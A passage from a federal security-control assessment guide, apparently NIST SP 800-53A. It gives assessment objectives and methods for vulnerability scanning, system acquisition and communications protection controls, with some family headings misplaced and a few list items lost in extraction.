| RA-5.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the frequency of vulnerability scans within the information system; | |
| (ii) the organization scans for vulnerabilities in the information system in accordance with the organization-defined frequency and/or random in accordance with organizational policy and assessment of risk, or when significant new vulnerabilities potentially affecting the system are identified and reported; | |
| (iii) the organization uses appropriate scanning tools and techniques to conduct the vulnerability scans; | |
| (iv) the organization trains selected personnel in the use and maintenance of vulnerability scanning tools and techniques; and | |
| (v) the organization freely shares the information obtained from the vulnerability scanning process with appropriate personnel throughout the organization to help eliminate similar vulnerabilities in other information systems. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Risk assessment policy; procedures addressing vulnerability scanning; risk assessment; security plan; vulnerability scanning results; patch and vulnerability management records; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with risk assessment and vulnerability scanning responsibilities]. (M) (H) | |
| RA-5(1) | VULNERABILITY SCANNING |
| Control Enhancement: | |
| The organization employs vulnerability scanning tools that include the capability to readily update the list of information system vulnerabilities scanned. | |
| RA-5(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization uses vulnerability scanning tools that have the capability to readily update the list of information system vulnerabilities scanned. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Risk assessment policy; procedures addressing vulnerability scanning; risk assessment; vulnerability scanning tools and techniques documentation; vulnerability scanning results; patch and vulnerability management records; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Vulnerability scanning capability and associated scanning tools]. (H) | |
| RA-5(2) | VULNERABILITY SCANNING |
| Control Enhancement: | |
| The organization updates the list of information system vulnerabilities scanned [Assignment: organization-defined frequency] or when significant new vulnerabilities are identified and reported. | |
| RA-5(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the frequency of updates for information system vulnerabilities scanned; and | |
| (ii) the organization updates the list of information system vulnerabilities scanned in accordance with the organization-defined frequency or when significant new vulnerabilities are identified and reported. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Risk assessment policy; procedures addressing vulnerability scanning; risk assessment; security plan; list of vulnerabilities scanned; records of updates to vulnerabilities scanned; other relevant documents or records]. (H) | |
| RA-5(3) | VULNERABILITY SCANNING |
| Control Enhancement: | |
| The organization employs vulnerability scanning procedures that can demonstrate the breadth and depth of scan coverage, including vulnerabilities checked and information system components scanned. | |
| RA-5(3).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization implements procedures that can demonstrate the breadth of scan coverage (including information system components scanned); and | |
| (ii) the organization implements procedures that can demonstrate the depth of scan coverage (including vulnerabilities checked). | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Risk assessment policy; procedures addressing vulnerability scanning; risk assessment; list of vulnerabilities scanned and information system components checked; other relevant documents or records]. |
FAMILY:
System and Communications Protection
| ASSESSMENT PROCEDURE | |
| SA-1 | SYSTEM AND SERVICES ACQUISITION POLICY AND PROCEDURES |
| Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, system and services acquisition policy that includes information security considerations and that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the system and services acquisition policy and associated system and services acquisition controls. | |
| Supplemental Guidance: The system and services acquisition policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The system and services acquisition policy can be included as part of the general information security policy for the organization. System and services acquisition procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures. | |
| SA-1.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and documents system and services acquisition policy and procedures; | |
| (ii) the organization disseminates system and services acquisition policy and procedures to appropriate elements within the organization; | |
| (iii) responsible parties within the organization periodically review system and services acquisition policy and procedures; and | |
| (iv) the organization updates system and services acquisition policy and procedures when organizational review indicates updates are required. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and services acquisition policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with system and services acquisition responsibilities]. (H) | |
| SA-1.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the system and services acquisition policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance; | |
| (ii) the system and services acquisition policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and | |
| (iii) the system and services acquisition procedures address all areas identified in the system and services acquisition policy and address achieving policy-compliant implementations of all associated system and services acquisition controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and services acquisition policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with system and services acquisition responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| SA-2 | ALLOCATION OF RESOURCES |
| Control: The organization determines, documents, and allocates as part of its capital planning and investment control process, the resources required to adequately protect the information system. | |
| Supplemental Guidance: The organization includes the determination of security requirements for the information system in mission/business case planning and establishes a discrete line item for information system security in the organization's programming and budgeting documentation. NIST Special Publication 800-65 provides guidance on integrating security into the capital planning and investment control process. | |
| SA-2.1 | ASSESSMENT OBJECTIVE: |
Determine if the organization determines, documents, and allocates as part of its capital planning and investment control process, the resources required to adequately protect the information system by verifying that the organization:
| |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and services acquisition policy; procedures addressing the allocation of resources to information security requirements; NIST Special Publication 800- 65; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with capital planning and investment responsibilities]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| SA-3 | LIFE CYCLE SUPPORT |
| Control: The organization manages the information system using a system development life cycle methodology that includes information security considerations. | |
| Supplemental Guidance: NIST Special Publication 800-64 provides guidance on security considerations in the system development life cycle. | |
| SA-3.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization manages the information system using a system development life cycle methodology that includes information security considerations; and | |
| (ii) the organization uses a system development life cycle that is consistent with NIST Special Publication 800-64. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and services acquisition policy; procedures addressing the integration of information security into the system development life cycle process; NIST Special Publication 800-64; information system development life cycle documentation; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information security and system life cycle development responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| SA-4 | ACQUISITIONS |
| Control: The organization includes security requirements and/or security specifications, either explicitly or by reference, in information system acquisition contracts based on an assessment of risk and in accordance with applicable laws, Executive Orders, directives, policies, regulations, and standards. | |
| Supplemental Guidance: | |
| Solicitation Documents | |
| The solicitation documents (e.g., Requests for Proposals) for information systems and services include, either explicitly or by reference, security requirements that describe: (i) required security capabilities (security needs and, as necessary, specific security controls and other specific FISMA requirements); (ii) required design and development processes; (iii) required test and evaluation procedures; and (iv) required documentation. The requirements in the solicitation documents permit updating security controls as new threats/vulnerabilities are identified and as new technologies are implemented. NIST Special Publication 800-36 provides guidance on the selection of information security products. NIST Special Publication 800-35 provides guidance on information technology security services. NIST Special Publication 800-64 provides guidance on security considerations in the system development life cycle. | |
| Information System Documentation | |
| The solicitation documents include requirements for appropriate information system documentation. The documentation addresses user and systems administrator guidance and information regarding the implementation of the security controls in the information system. The level of detail required in the documentation is based on the FIPS 199 security category for the information system. | |
| Use of Tested, Evaluated, and Validated Products | |
| NIST Special Publication 800-23 provides guidance on the acquisition and use of tested/evaluated information technology products. | |
| Configuration Settings and Implementation Guidance | |
| The information system required documentation includes security configuration settings and security implementation guidance. OMB FISMA reporting instructions provide guidance on configuration requirements for federal information systems. NIST Special Publication 800-70 provides guidance on configuration settings for information technology products. | |
| SA-4.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
(i) the organization includes in acquisition contracts for information systems, either explicitly or by reference, security requirements and/or security specifications based on an assessment of risk and in accordance with applicable laws, Executive Orders, directives, policies, regulations, and standards that describe required:
| |
| (ii) the organization includes in acquisition contracts, requirements for information system documentation addressing user and systems administrator guidance and information regarding the implementation of the security controls in the system and at a level of detail based on the FIPS 199 security category for the system.; and | |
| (iii) the organization includes in acquisition contracts requirements for information system documentation that includes security configuration settings and security implementation guidance. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and services acquisition policy; procedures addressing the integration of information security requirements and/or security specifications into the acquisition process; NIST Special Publications 800-23 and 800-70; acquisition documentation; acquisition contracts for information systems or services; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system security, acquisition, and contracting responsibilities]. (M) (H) | |
| SA-4(1) | ACQUISITIONS |
| Control Enhancement: | |
| The organization requires in solicitation documents that appropriate documentation be provided describing the functional properties of the security controls employed within the information system with sufficient detail to permit analysis and testing of the controls. | |
| SA-4(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization requires in solicitation documents that appropriate documentation be provided describing the functional properties of the security controls employed within the information system with sufficient detail to permit analysis and testing of the controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and services acquisition policy; procedures addressing the integration of information security requirements and/or security specifications into the acquisition process; solicitation documents; acquisition documentation; acquisition contracts for information systems or services; other relevant documents or records]. (M) (H) | |
| SA-4(2) | ACQUISITIONS |
| Control Enhancement: | |
| The organization requires in solicitation documents that appropriate documentation be provided describing the design and implementation details of the security controls employed within the information system with sufficient detail to permit analysis and testing of the controls (including functional interfaces among control components). | |
| SA-4(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization requires in solicitation documents that appropriate documentation be provided describing the design and implementation details of the security controls employed within the information system with sufficient detail to permit analysis and testing of the controls (including functional interfaces among control components). | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and services acquisition policy; procedures addressing the integration of information security requirements and/or security specifications into the acquisition process; solicitation documents; acquisition documentation; acquisition contracts for information systems or services; other relevant documents or records]. |
| ASSESSMENT PROCEDURE | |
| SA-5 | INFORMATION SYSTEM DOCUMENTATION |
| Control: The organization obtains, protects as required, and makes available to authorized personnel, adequate documentation for the information system. | |
| Supplemental Guidance: Documentation includes administrator and user guides with information on: (i) configuring, installing, and operating the information system; and (ii) effectively using the system's security features. When adequate information system documentation is either unavailable or non existent (e.g., due to the age of the system or lack of support from the vendor/manufacturer), the organization documents attempts to obtain such documentation and provides compensating security controls, if needed. | |
| SA-5.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
(i) the organization obtains, protects as required, and makes available to authorized personnel, information system administrator and user guidance with information on:
| |
| (ii) the organization, when this information is either unavailable or non existent (e.g., due to the age of the system or lack of support from the vendor/manufacturer), the organization documents attempts to obtain such documentation and provides compensating security controls, if needed. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and services acquisition policy; procedures addressing information system documentation; information system documentation including administrator and user guides; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system documentation responsibilities; organizational personnel operating, using, and/or maintaining the information system]. (M) (H) | |
| SA-5(1) | INFORMATION SYSTEM DOCUMENTATION |
| Control Enhancement: | |
| The organization includes, in addition to administrator and user guides, documentation, if available from the vendor/manufacturer, describing the functional properties of the security controls employed within the information system with sufficient detail to permit analysis and testing of the controls. | |
| SA-5(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization includes, in addition to administrator and user guides, documentation, if available from the vendor/manufacturer, describing the functional properties of the security controls employed within the information system with sufficient detail to permit analysis and testing of the controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and services acquisition policy; procedures addressing information system documentation; information system design documentation; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system security, acquisition, and contracting responsibilities; organizational personnel operating, using, and/or maintaining the information system]. (M) (H) | |
| SA-5(2) | INFORMATION SYSTEM DOCUMENTATION |
| Control Enhancement: | |
| The organization includes, in addition to administrator and user guides, documentation, if available from the vendor/manufacturer, describing the design and implementation details of the security controls employed within the information system with sufficient detail to permit analysis and testing of the controls (including functional interfaces among control components). | |
| SA-5(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization includes, in addition to administrator and user guides, documentation, if available from the vendor/manufacturer, describing the design and implementation details of the security controls employed within the information system with sufficient detail to permit analysis and testing of the controls (including functional interfaces among control components). | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and services acquisition policy; procedures addressing information system documentation; information system design documentation; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system security documentation responsibilities; organizational personnel operating, using, and/or maintaining the information system]. (H) |
| ASSESSMENT PROCEDURE | |
| SA-6 | SOFTWARE USAGE RESTRICTIONS |
| Control: The organization complies with software usage restrictions. | |
| Supplemental Guidance: Software and associated documentation are used in accordance with contract agreements and copyright laws. For software and associated documentation protected by quantity licenses, the organization employs tracking systems to control copying and distribution. The organization controls and documents the use of publicly accessible peer-to-peer file sharing technology to ensure that this capability is not used for the unauthorized distribution, display, performance, or reproduction of copyrighted work. | |
| SA-6.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization complies with software usage restrictions; and | |
| (ii) the organization employs tracking systems to control copying and distribution of software and associated documentation protected by quantity licenses; and | |
| (iii) the organization controls and documents the use of publicly accessible peer-to-peer file sharing technology to ensure that this capability is not used for the unauthorized distribution, display, performance, or reproduction of copyrighted work. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and services acquisition policy; procedures addressing software usage restrictions; site license documentation; list of software usage restrictions; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system administration responsibilities; organizational personnel operating, using, and/or maintaining the information system]. (H) |
| ASSESSMENT PROCEDURE | |
| SA-7 | USER INSTALLED SOFTWARE |
| Control: The organization enforces explicit rules governing the installation of software by users. | |
| Supplemental Guidance: If provided the necessary privileges, users have the ability to install software. The organization identifies what types of software installations are permitted (e.g., updates and security patches to existing software) and what types of installations are prohibited (e.g., software that is free only for personal, not government use, and software whose pedigree with regard to being potentially malicious is unknown or suspect). | |
| SA-7.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization enforces explicit rules governing the installation of software by users that include organization-identified types of software installations that are permitted and types of installations that are prohibited. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and services acquisition policy; procedures addressing user installed software; list of rules governing user installed software; network traffic on the information system; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system administration responsibilities; organizational personnel operating, using, and/or maintaining the information system]. (M) (H) | |
| Test: [SELECT FROM: Enforcement of rules for user installed software on the information system; information system for prohibited software]. (H) |
| ASSESSMENT PROCEDURE | |
| SA-8 | SECURITY ENGINEERING PRINCIPLES |
| Control: The organization designs and implements the information system using security engineering principles. | |
| Supplemental Guidance: NIST Special Publication 800-27 provides guidance on engineering principles for information system security. The application of security engineering principles is primarily targeted at new development information systems or systems undergoing major upgrades and is integrated into the system development life cycle. For legacy information systems, the organization applies security engineering principles to system upgrades and modifications, to the extent feasible, given the current state of the hardware, software, and firmware components within the system. | |
| SA-8.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization designs and implements the information system using security engineering principles; and | |
| (ii) the organization considers the security design principles in NIST Special Publication 800-27 in the design, development, and implementation of the information system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and services acquisition policy; procedures addressing security engineering principles used in the development and implementation of the information system; NIST Special Publication 800-27; information system design documentation; security requirements and security specifications for the information system; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with system and services acquisition responsibilities]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| SA-9 | EXTERNAL INFORMATION SYSTEM SERVICES |
| Control: The organization: (i) requires that providers of external information system services employ adequate security controls in accordance with applicable laws, Executive Orders, directives, policies, regulations, standards, guidance, and established service-level agreements; and (ii) monitors security control compliance. | |
| Supplemental Guidance: An external information system service is a service that is implemented outside of the accreditation boundary of the organizational information system (i.e., a service that is used by, but not a part of, the organizational information system). Relationships with external service providers are established in a variety of ways, for example, through joint ventures, business partnerships, outsourcing arrangements (i.e., through contracts, interagency agreements, lines of business arrangements), licensing agreements, and/or supply chain exchanges. Ultimately, the responsibility for adequately mitigating risks to the organization's operations and assets, and to individuals, arising from the use of external information system services remains with the authorizing official. Authorizing officials must require that an appropriate chain of trust be established with external service providers when dealing with the many issues associated with information system security. For services external to the organization, a chain of trust requires that the organization establish and retain a level of confidence that each participating service provider in the potentially complex consumer-provider relationship provides adequate protection for the services rendered to the organization. Where a sufficient level of trust cannot be established in the external services and/or service providers, the organization employs compensating security controls or accepts the greater degree of risk to its operations and assets, or to individuals. The external information system services documentation includes government, service provider, and end user security roles and responsibilities, and any service-level agreements. Service- level agreements define the expectations of performance for each required security control, describe measurable outcomes, and identify remedies and response requirements for any identified instance of non-compliance. NIST Special Publication 800-35 provides guidance on information technology security services. NIST Special Publication 800-64 provides guidance on the security considerations in the system development life cycle. | |
| SA-9.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization requires that providers of external information system services employ adequate security controls in accordance with applicable laws, Executive Orders, directives, policies, regulations, standards, guidance, and established service-level agreements; and | |
| (ii) the organization monitors security control compliance. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and services acquisition policy; procedures addressing external information system services; acquisition contracts and service level agreements; organizational security requirements and security specifications for external provider services; security control assessment evidence from external providers of information system services; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with system and services acquisition responsibilities; external providers of information system services]. (H) |
| ASSESSMENT PROCEDURE | |
| SA-10 | DEVELOPER CONFIGURATION MANAGEMENT |
| Control: The organization requires that information system developers create and implement a configuration management plan that controls changes to the system during development, tracks security flaws, requires authorization of changes, and provides documentation of the plan and its implementation. | |
| Supplemental Guidance: This control also applies to the development actions associated with information system changes. | |
| SA-10.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization requires that information system developers create and implement a configuration management plan that controls changes to the system during development, tracks security flaws, requires authorization of changes, and provides documentation of the plan and its implementation. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and services acquisition policy; procedures addressing information system developer/integrator configuration management; acquisition contracts and service level agreements; information system developer/integrator configuration management plan; security flaw tracking records; system change authorization records; other relevant documents or records]. (H) |
| ASSESSMENT PROCEDURE | |
| SA-11 | DEVELOPER SECURITY TESTING |
| Control: The organization requires that information system developers create a security test and evaluation plan, implement the plan, and document the results. | |
| Supplemental Guidance: Developmental security test results are used to the greatest extent feasible after verification of the results and recognizing that these results are impacted whenever there have been security relevant modifications to the information system subsequent to developer testing. Test results may be used in support of the security certification and accreditation process for the delivered information system. Related security controls: CA-2, CA-4. | |
| SA-11.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization requires that information system developers (and systems integrators) create a security test and evaluation plan, implement the plan, and document the results. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and services acquisition policy; procedures addressing information system developer/integrator security testing; acquisition contracts and service level agreements; information system developer/integrator security test plans; records of developer/integrator security testing results for the information system; other relevant documents or records]. (M) (H) |
FAMILY:
System and Information Integrity
| ASSESSMENT PROCEDURE | |
| SC-1 | SYSTEM AND COMMUNICATIONS PROTECTION POLICY AND PROCEDURES |
| Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, system and communications protection policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the system and communications protection policy and associated system and communications protection controls. | |
| Supplemental Guidance: The system and communications protection policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The system and communications protection policy can be included as part of the general information security policy for the organization. System and communications protection procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures. | |
| SC-1.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and documents system and communications protection policy and procedures; | |
| (ii) the organization disseminates system and communications protection policy and procedures to appropriate elements within the organization; | |
| (iii) responsible parties within the organization periodically review system and communications protection policy and procedures; and | |
| (iv) the organization updates system and communications protection policy and procedures when organizational review indicates updates are required. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with system and communications protection responsibilities]. (H) | |
| SC-1.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the system and communications protection policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance; | |
| (ii) the system and communications protection policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and | |
| (iii) the system and communications protection procedures address all areas identified in the system and communications protection policy and address achieving policy- compliant implementations of all associated system and communications protection controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with system and communications protection responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| SC-2 | APPLICATION PARTITIONING |
| Control: The information system separates user functionality (including user interface services) from information system management functionality. | |
| Supplemental Guidance: The information system physically or logically separates user interface services (e.g., public web pages) from information storage and management services (e.g., database management). Separation may be accomplished through the use of different computers, different central processing units, different instances of the operating system, different network addresses, combinations of these methods, or other methods as appropriate. | |
| SC-2.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system separates user functionality (including user interface services) from information system management functionality. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing application partitioning; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Separation of user functionality from information system management functionality]. (H) |
| ASSESSMENT PROCEDURE | |
| SC-3 | SECURITY FUNCTION ISOLATION |
| Control: The information system isolates security functions from nonsecurity functions. | |
| Supplemental Guidance: The information system isolates security functions from nonsecurity functions by means of partitions, domains, etc., including control of access to and integrity of, the hardware, software, and firmware that perform those security functions. The information system maintains a separate execution domain (e.g., address space) for each executing process. | |
| SC-3.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines the security functions of the information system to be isolated from nonsecurity functions; and | |
| (ii) the information system isolates security functions from nonsecurity functions. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing security function isolation; list of security functions to be isolated from nonsecurity functions; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Separation of security functions from nonsecurity functions within the information system]. (H) | |
| SC-3(1) | SECURITY FUNCTION ISOLATION |
| Control Enhancement: | |
| The information system employs underlying hardware separation mechanisms to facilitate security function isolation. | |
| SC-3(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system employs underlying hardware separation mechanisms to facilitate security function isolation. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing security function isolation; information system design documentation; hardware separation mechanisms; information system configuration settings and associated documentation; other relevant documents or records]. | |
| Test: [SELECT FROM: Hardware separation mechanisms facilitating security function isolation]. | |
| SC-3(2) | SECURITY FUNCTION ISOLATION |
| Control Enhancement: | |
| The information system isolates critical security functions (i.e., functions enforcing access and information flow control) from both nonsecurity functions and from other security functions. | |
| SC-3(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system isolates security functions enforcing access and information flow control from both nonsecurity functions and from other security functions. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing security function isolation; list of critical security functions; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. | |
| Test: [SELECT FROM: Isolation of critical security functions]. | |
| SC-3(3) | SECURITY FUNCTION ISOLATION |
| Control Enhancement: | |
| The information system minimizes the number of nonsecurity functions included within the isolation boundary containing security functions. | |
| SC-3(3).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system minimizes the number of nonsecurity functions included within the isolation boundary containing security functions. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing security function isolation; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. | |
| SC-3(4) | SECURITY FUNCTION ISOLATION |
| Control Enhancement: | |
| The information system security functions are implemented as largely independent modules that avoid unnecessary interactions between modules. | |
| SC-3(4).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system security functions are implemented as largely independent modules that avoid unnecessary interactions between modules. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing security function isolation; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. | |
| SC-3(5) | SECURITY FUNCTION ISOLATION |
| Control Enhancement: | |
| The information system security functions are implemented as a layered structure minimizing interactions between layers of the design and avoiding any dependence by lower layers on the functionality or correctness of higher layers. | |
| SC-3(5).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system security functions are implemented as a layered structure minimizing interactions between layers of the design and avoiding any dependence by lower layers on the functionality or correctness of higher layers. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing security function isolation; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. |
| ASSESSMENT PROCEDURE | |
| SC-4 | INFORMATION REMNANCE |
| Control: The information system prevents unauthorized and unintended information transfer via shared system resources. | |
| Supplemental Guidance: Control of information system remnance, sometimes referred to as object reuse, or data remnance, prevents information, including encrypted representations of information, produced by the actions of a prior user/role (or the actions of a process acting on behalf of a prior user/role) from being available to any current user/role (or current process) that obtains access to a shared system resource (e.g., registers, main memory, secondary storage) after that resource has been released back to the information system. | |
| SC-4.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system prevents unauthorized and unintended information transfer via shared system resources. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing information remnance; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Information system for unauthorized and unintended transfer of information via shared system resources]. (H) |
| ASSESSMENT PROCEDURE | |
| SC-5 | DENIAL OF SERVICE PROTECTION |
| Control: The information system protects against or limits the effects of the following types of denial of service attacks: [Assignment: organization-defined list of types of denial of service attacks or reference to source for current list]. | |
| Supplemental Guidance: A variety of technologies exist to limit, or in some cases, eliminate the effects of denial of service attacks. For example, boundary protection devices can filter certain types of packets to protect devices on an organization's internal network from being directly affected by denial of service attacks. Information systems that are publicly accessible can be protected by employing increased capacity and bandwidth combined with service redundancy. | |
| SC-5.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the types of denial of service attacks (or provides references to sources of current denial of service attacks) that can be addressed by the information system; and | |
| (ii) the information system protects against or limits the effects of the organization- defined or referenced types of denial of service attacks. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing denial of service protection; information system design documentation; security plan; information system configuration settings and associated documentation; other relevant documents or records]. (L) (M) (H) | |
| Test: [SELECT FROM: Information system for protection against or limitation of the effects of denial of service attacks]. (M) (H) | |
| SC-5(1) | DENIAL OF SERVICE PROTECTION |
| Control Enhancement: | |
| The information system restricts the ability of users to launch denial of service attacks against other information systems or networks. | |
| SC-5(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system restricts the ability of users to launch denial of service attacks against other information systems or networks. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing denial of service protection; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. | |
| Test: [SELECT FROM: Information system for protection against or limitation of the effects of denial of service attacks]. | |
| SC-5(2) | DENIAL OF SERVICE PROTECTION |
| Control Enhancement: | |
| The information system manages excess capacity, bandwidth, or other redundancy to limit the effects of information flooding types of denial of service attacks. | |
| SC-5(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system manages excess capacity, bandwidth, or other redundancy to limit the effects of information flooding types of denial of service attacks. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing denial of service protection; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. | |
| Test: [SELECT FROM: Automated mechanisms implementing information system bandwidth, capacity, and redundancy management]. |
| ASSESSMENT PROCEDURE | |
| SC-6 | RESOURCE PRIORITY |
| Control: The information system limits the use of resources by priority. | |
| Supplemental Guidance: Priority protection helps prevent a lower-priority process from delaying or interfering with the information system servicing any higher-priority process. | |
| SC-6.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system limits the use of resources by priority. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
